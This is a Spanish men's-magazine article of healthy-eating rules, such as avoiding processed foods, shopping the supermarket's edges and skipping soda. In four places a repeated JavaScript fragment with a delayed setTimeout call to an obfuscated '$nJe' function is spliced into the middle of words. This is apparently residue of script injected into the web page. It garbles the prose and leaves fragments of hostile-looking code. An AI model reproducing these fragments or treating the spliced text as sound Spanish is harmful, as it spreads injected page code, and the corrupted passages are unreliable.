Reglas para tus comidas

    Reglas para tus comidas

    Con estas reglas podrás cuidar qué llevas a tu plato y por ende tu peso.

    Autor: Redacción Maxim 15 enero, 2020


    FOTO: UnSplash

     

    Elige mejor lo que vas a meter a tu boca.

     

    Por Maxim Australia

     

    A veces comemos cosas que no sólo no sabemos qué son, ni las sabemos pronunciar, a la larga le hacen daño a nuestro organismo. por eso sigue estas reglas que tenemos para ti y mejora tus hábitos de comida.

     

    Come solo alimentos que se pudran

    Cuanto más procesado es un alimento, más nutrientes ha eliminado para evitar que se pudra, lo que ocurre cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando las bacterias y otros organismos se alimentan de estos nutrientes. Por lo tanto, el producto final tendrá una vida útil más larga pero un valor nutricional más bajo.

    Recuerde que la comida real está viva, por lo que eventualmente morirá.

     

     

    Evita los productos alimenticios que hacen afirmaciones saludables por sí mismos.

    Suena contradictorio, ¿verdad? Pero para llevar una declaración de propiedades saludables, la comida debe tener un empaque, por lo que es más probable que sea procesada de inmediato. La comida más saludable en el supermercado, los productos frescos, no se jacta de lo saludable que es porque (a) no viene empaquetada y (b) los productores no tienen el presupuesto de las grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes corporaciones.

     

    Evita los productos alimenticios que contengan más de cinco ingredientes.

    Cuantos más ingredientes contenga un alimento envasado, es probable que sea más procesado. Toma en cuenta que esto no se aplica a una receta para una comida casera, solo a productos alimenticios preenvasados.

     

    Si proviene de una planta, cómela. Si se hizo en una planta, no.

    Realmente es tan simple como eso. Hay una razón por la cual todas las cocinas del mundo todavía usan hierbas frescas y verduras.

     

     

    Evita los ingredientes que no se encuentran en tu alacena

    ¿Diglicéridos etoxilados? ¿Goma de xantano? ¿Sulfato de amonio? No puedes comprarlos en la verdulería. Si no cocinarías con estos «ingredientes», ¿por qué dejar que otros los usen en los alimentos que vas a comer? Estos productos químicos se utilizan para mantener los alimentos frescos por más tiempo, y aunque pueden ser un riesgo para la salud o no, el simple hecho de que los humanos no los hayan estado comiendo durante mucho tiempo significa que es mejor evitarlos.

     

    Agrega colores a tu plato

    El color de muchos vegetales refleja los diferentes fitoquímicos antioxidantes que contienen, como antocianinas, polifenoles, flavonoides y carotenoides. Muchos de estos químicos ayudan a proteger contra enfermedades crónicas, pero cada uno lo hace de una manera diferente, por lo que la mejor protección proviene de una dieta que contenga tantos colores diferentes como sea posible.

     

    No comas nada que tu bisabuela no reconozca como comida

    Hay miles de productos «alimenticios» en los supermercados que nuestros antepasados ​​no reconocerían como alimentos. Se procesan de maneras específicamente diseñadas para que compremos y comamos más presionandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando nuestros botones evolutivos, nuestra preferencia natural por los alimentos dulces, salados y grasos. Estos gustos son difíciles de encontrar en la naturaleza, pero baratos y fáciles en las fábricas, que generalmente producen alimentos con un valor nutricional bajo o nulo.

     

     

    Compra de los extremos del supermercado y no del medio

    La mayoría de los supermercados se distribuyen de la misma manera: los alimentos procesados ​​dominan los pasillos centrales, mientras que los productos frescos, la carne, el pescado y los lácteos se alinean en las paredes. Si te quedas en los bordes de la tienda, terminarás con comida real en tu cesta al momento de pagar.

     

    No es comida si se llama con el mismo nombre en todos los idiomas

    Eso significa que está procesado, y probablemente podrías prescindir de él.

     

    Desayuna, despierta tu metabolismo.

    Prueba este, McChubby: combina una clara de huevo y una rebanada de jamón o pavo en un panecillo integral. Una pizca de tabasco.

     

    Come lo que quieras. Solo deja la mesa un poco hambriento

    Por ejemplo, ordena medio metro, no el metro completo; devora la hamburguesa, no las papas fritas; come dos rebanadas de pizza, no cuatro. 

     

     

    Omite la bebida gaseosa

    Evita los refrescos y limita el jugo. Beba agua (mucha, ocho vasos al día), café (la crema está bien) y vodka (tiene menos calorías que la cerveza) … espera, nos encanta la cerveza.

     

    Realiza colaciones a menudo.

    Come muchas nueces. Las almendras simples no son tan ricas, así que haz deliciosos smoothies de proteína con almendras asadas o horneadas. Después de un entrenamiento, desliza un plátano fresco y agradable en tu boca. (¿Hace calor aquí o sólo somos nosotros?) El potasio ayudará a combatir los calambres. Por la noche, bebe leche: las cosas blancas ricas en proteínas te harán sentir lleno, evitandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando los atracones de medianoche.

     

    Estos son los resultados de LAS MEJORES Y PEORES DIETAS 2020, CLASIFICADAS POR NUTRIÓLOGOS

     

     

     

    Temas relacionados con esta nota: , , ,

Con estas reglas podrás cuidar qué llevas a tu plato y por ende tu peso.